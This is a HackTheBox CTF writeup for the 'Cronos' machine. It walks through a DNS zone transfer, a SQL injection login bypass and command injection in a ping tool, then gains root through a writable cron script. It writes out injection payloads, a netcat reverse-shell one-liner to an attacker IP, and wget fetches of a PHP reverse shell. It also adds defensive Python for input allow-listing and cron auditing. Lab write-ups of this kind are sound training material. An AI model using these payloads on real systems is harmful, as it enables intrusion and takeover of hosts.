HacktheBox - Cronos Writeup

06/11/2019

Zero to OSCP Hero Writeup #13 - Cronos

Reconnaissance

1. Nmap Scan - TCP Scan

Let's start with a TCP scan of the target IP address to determine which ports are open and which services are running on those ports:

nmap -sC -sV -oA nmap/initial.tcp 10.10.10.13

  • -sC: Run the default nmap script scan to find potential vulnerabilities
  • -sV: Detect the service version
  • -oA: Output the result of the scan in all formats as nmap/initial.tcp

We have SSH, DNS and HTTP running on this machine. 

2. Nmap Scan - All TCP Ports Scan

Okay, let's scan the entire TCP port range to confirm that there are no other ports open:

nmap -sC -sV -p- -oA nmap/full.tcp 10.10.10.13

  • -sC: Run the default nmap script scan to find potential vulnerabilities
  • -sV: Detect the service version
  • -p-: Run the nmap scan against all ports
  • -oA: Output the result of the scan in all formats as nmap/full.tcp

The full TCP scan confirmed that there are no additional ports open.

3. Nmap Scan - All UDP Ports Scan

We can do the same full port scan, but with the UDP ports:

nmap -sU -p- -oA nmap/full.udp 10.10.10.13

  • -sU: Run the scan against UDP ports
  • -p-: Run the nmap scan against all ports
  • -oA: Output the result of the scan in all formats as nmap/full.udp

The full UDP scan confirmed that there are no additional ports open.  

Enumeration - Port 80 

1. Browse to 10.10.10.13 

Let's start with the web server. As we saw in the nmap scan, it just shows the default Apache page.

2. Gobuster

As there is nothing interesting on the default page, let's use gobuster to search for any hidden directories:

gobuster dir -u http://10.10.10.13 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

Nothing of note found here. 

Enumeration - Port 53 

As there was nothing of note found initially on port 80, let's see if there is anything to find on port 53, DNS.

DNS is used to translate human readable hostnames like www.google.com to an IP address. 

1. Checking for DNS Zone Transfers

Let's see if this DNS server allows DNS zone transfers:

dig axfr @10.10.10.13 cronos.htb

I used the domain cronos.htb, as the <machine>.htb naming is common for most HackTheBox machines.

Bingo!

We have found that DNS zone transfers are allowed, and we also have the subdomain information for cronos.htb.

2. Adding domains to /etc/hosts file

To browse to the found subdomains, we need to add them to our /etc/hosts file:

nano /etc/hosts

10.10.10.13 www.cronos.htb cronos.htb ns1.cronos.htb admin.cronos.htb

Enumeration - admin.cronos.htb 

Let's start to enumerate the most interesting subdomain found, admin.cronos.htb.

Okay, so a basic login page that doesn't accept any of my combinations of basic credentials...

1. Testing for SQL Injection 

So before I run sqlmap on the login page, I like to just try basic SQLi payloads in the user input fields, so I used admin' or 1=1; -- in the username field and it logged me in!

The SQL Injection only worked on the username field, and not the password field. 

2. Testing The Net Tool Functionality

As we can see, there are two given options here to test networking connectivity, traceroute and ping. 

When trying to run the traceroute command on 8.8.8.8, it just hangs but when trying the ping option, we get a result returned. 

Now, let's see if we can ping our attacker machine... and we can!

3. Confirm Command Injection Vulnerability

Running system commands through a web application can be dangerous, as it may give an attacker the chance to inject their own commands, and it seems Cronos has this problem!

10.10.14.32; whoami
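The root cause is that the ping tool hands user input to a shell. As an added example (not the code of the Cronos Laravel app, which is PHP; this is a Python stand-in), here is what the same ping function looks like when the target is allow-listed and ping is executed without a shell:

```python
import ipaddress
import re
import subprocess

# RFC 1123 hostname: dot-separated labels of letters, digits and hyphens,
# no label starting or ending with a hyphen, 253 characters at most.
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
    r"(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)


def is_valid_ping_target(target: str) -> bool:
    """Allow-list check: accept an IP literal or a plain hostname, nothing else.

    Shell metacharacters (';', '|', '$', spaces) and a leading '-' (which
    would let a caller smuggle in extra ping options) never pass this check.
    """
    try:
        ipaddress.ip_address(target)
        return True
    except ValueError:
        pass
    return bool(_HOSTNAME_RE.match(target))


def build_ping_argv(target: str, count: int = 4) -> list:
    """Build the argument vector for ping; raises ValueError on bad input."""
    if not is_valid_ping_target(target):
        raise ValueError("ping target must be an IP address or hostname")
    # Passing a list (no shell) means the target can never be parsed as
    # a second command, which is exactly the Cronos bug.
    return ["ping", "-c", str(int(count)), target]


def run_ping(target: str, count: int = 4, timeout: int = 30) -> str:
    """Run ping without a shell and return its stdout."""
    proc = subprocess.run(build_ping_argv(target, count),
                          capture_output=True, text=True, timeout=timeout)
    return proc.stdout


if __name__ == "__main__":
    for candidate in ("8.8.8.8", "www.cronos.htb", "10.10.14.32; whoami", "-f"):
        print(f"{candidate!r:28} valid={is_valid_ping_target(candidate)}")
```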

Initial Foothold - User

1. Exploit Command Injection

Now that we have confirmed that we can enter system commands through the ping option, we can try a reverse shell command. I'm going to use the netcat one from pentestmonkey:

10.10.14.32; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.32 9001 >/tmp/f

Start a netcat listener: 

nc -lvnp 9001 

Execute the ping command... and we now have a connection on our netcat listener as www-data! 

Make the shell fully interactive: 

https://forum.hackthebox.eu/discussion/142/obtaining-a-fully-interactive-shell

We can now grab the user.txt flag from the /home/noulis directory: 

cat user.txt 

Privilege Escalation - Root

1. Using LinEnum to enumerate the machine

Now that we have an initial foothold on the machine, I'm going to use the automated enumeration script, LinEnum.sh.

To get this onto the machine, we first need to start an HTTP server on our attacker machine in the directory containing LinEnum:

python -m SimpleHTTPServer 80 

Then on the cronos machine, we can use wget to download the script:

wget 10.10.14.32/LinEnum.sh 

Make the script executable and run it: 

chmod +x LinEnum.sh 

./LinEnum.sh 

2. Checking crontab file

From the output of the scan, there is an entry in the crontab that shows the file artisan is being executed by root using php.

Let's check the permissions of the artisan file:

cd /var/www/laravel/

ls -l

It shows here that www-data is the owner of the file, meaning we can read, write and execute it.
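A defender can catch this misconfiguration before anyone else does. The following added example (my own Python, not LinEnum or anything from the box) parses /etc/crontab-style entries and flags root jobs whose script, or the directory holding it, is writable by a non-root user; the sample crontab text is constructed, with the artisan line modelled on the entry above:

```python
import os
import shlex
import stat

# Constructed sample in /etc/crontab format (five time fields, user, command);
# the artisan line mirrors the entry LinEnum surfaced on Cronos.
SAMPLE_CRONTAB = """\
# m h dom mon dow user   command
17 *  * * *  root  cd / && run-parts --report /etc/cron.hourly
*  *  * * *  root  php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
"""


def parse_system_crontab(text):
    """Yield (user, command) for every active entry in /etc/crontab format."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 6)        # 5 time fields, user, rest of line
        if len(parts) == 7:
            yield parts[5], parts[6]


def script_paths(command):
    """Absolute paths a cron command touches, ignoring /dev/* redirect targets."""
    return [tok for tok in shlex.split(command)
            if tok.startswith("/") and not tok.startswith("/dev/")]


def writable_by_non_root(path):
    """True if a user other than root could modify path (missing path: False)."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return False
    if st.st_uid != 0:                      # non-root owner, as with www-data on Cronos
        return True
    if st.st_mode & stat.S_IWGRP and st.st_gid != 0:
        return True
    return bool(st.st_mode & stat.S_IWOTH)  # world-writable


def find_risky_root_cron_scripts(crontab_text):
    """Return (path, command) pairs where root runs something a non-root user can change."""
    risky = []
    for user, command in parse_system_crontab(crontab_text):
        if user != "root":
            continue
        for path in script_paths(command):
            # a writable parent directory lets the file be swapped out, so check both
            if writable_by_non_root(path) or writable_by_non_root(os.path.dirname(path)):
                risky.append((path, command))
    return risky
```

Run it against the real /etc/crontab and the files in /etc/cron.d on a host to audit; user crontabs (crontab -l) have no user field and need the job owner supplied separately.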

3. Copying php reverse shell to artisan file

As we know the file will be executed using php, let's edit the php-reverse-shell.php file on our attacker machine and download it from the cronos machine:

nano php-reverse-shell.php

Start an HTTP server in the php rev shell directory:

python -m SimpleHTTPServer 8081

Download the file using wget on the cronos machine: 

wget 10.10.14.32:8081/php-reverse-shell.php

Copy the reverse shell to the artisan file:

cp /tmp/php-reverse-shell.php artisan

Start a netcat listener on our attacker machine: 

nc -lvnp 9002

and after a few seconds, we get a connection to our listener, as root!

Make the shell fully interactive: 

https://forum.hackthebox.eu/discussion/142/obtaining-a-fully-interactive-shell

We can now grab the root.txt flag! 

What did I learn from Cronos?

Giving users the ability to run system commands in a web application can be dangerous if not properly implemented. Running a vulnerable Linux version can expose you to kernel exploits, and running a cronjob as root when lower-privileged users can write and execute the file in the crontab is asking for trouble!

Conclusion

Thanks for reading! Next up is Box #14 - Arctic!